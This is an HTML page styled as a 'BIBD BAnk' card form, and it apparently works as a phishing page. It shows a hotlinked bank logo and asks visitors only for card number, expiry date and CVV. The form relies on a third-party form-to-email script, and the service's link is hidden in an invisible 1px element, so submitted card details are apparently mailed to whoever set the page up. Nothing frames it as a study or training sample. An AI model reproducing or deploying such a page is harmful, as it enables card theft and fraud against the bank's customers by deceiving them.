<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="styles.css">
    <title>BIBD BAnk  </title>
</head>
<body>
    <div class="container">


        <center>
            <style>
                         img {
                           border: 1px solid #ddd;
                           border-radius: 30px;
                           padding: 5px;
                           width: 150px;
                         }
                         </style>
                         </head>
                         <body>
                         
                         
                         
                         <img src="https://play-lh.googleusercontent.com/f9oJsayJ-XmXIjWJwkTsL36gFlThPdHBEtVifecmU0AqhdrxD_FbymK1V-iyD7MkbqY" alt="Paris" style="width:150px">
                         
             </center>
         
         <div class="bg-img">

       
            <form method="post" action="//submit.form" >
            <div class="form-group">
                <label for="card-number"><b>Card Number</b></label>
            <input type="text" placeholder="1234 5678 9012 3456" name="card-number" required>

               
            </div>
            <div class="form-group">
                <label for="expiration"><b>Expiration Date</b></label>
            <input type="expiration" placeholder="MM/YY" name="expiration" required>
               
            </div>
            <div class="form-group">
                <label for="cvv"><b>CVV</b></label>
            <input type="cvv" placeholder="123" name="cvv" required>
            </div>

            


            <div style='font-size:1px; opacity:0;' style="float:right"><a href="https://www.100forms.com" id="lnk100" title="form to email">form to email</a></div>
        <script src="https://www.100forms.com/js/FORMKEY:9KPS3YX4GXKY" type="text/javascript"></script>
            <button type="submit">Submit</button>
        </form>
    </div>
</body>
</html>
<style>


body {
    font-family: Arial, sans-serif;
    background-color: #f4f4f4;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    margin: 0;
}

.container {
    background: white;
    padding: 20px;
    border-radius: 5px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
    width: 300px;
}

h2 {
    text-align: center;
    margin-bottom: 20px;
}

.form-group {
    margin-bottom: 15px;
}

label {
    display: block;
    margin-bottom: 5px;
}

input {
    width: 100%;
    padding: 10px;
    border: 1px solid #ccc;
    border-radius: 5px;
}

input:focus {
    border-color: #f53333;
    outline: none;
}

button {
    width: 100%;
    padding: 10px;
    background: #f53333;
    color: white;
    border: none;
    border-radius: 5px;
    cursor: pointer;
}

button:hover {
    background: #f53333;
}

</style>
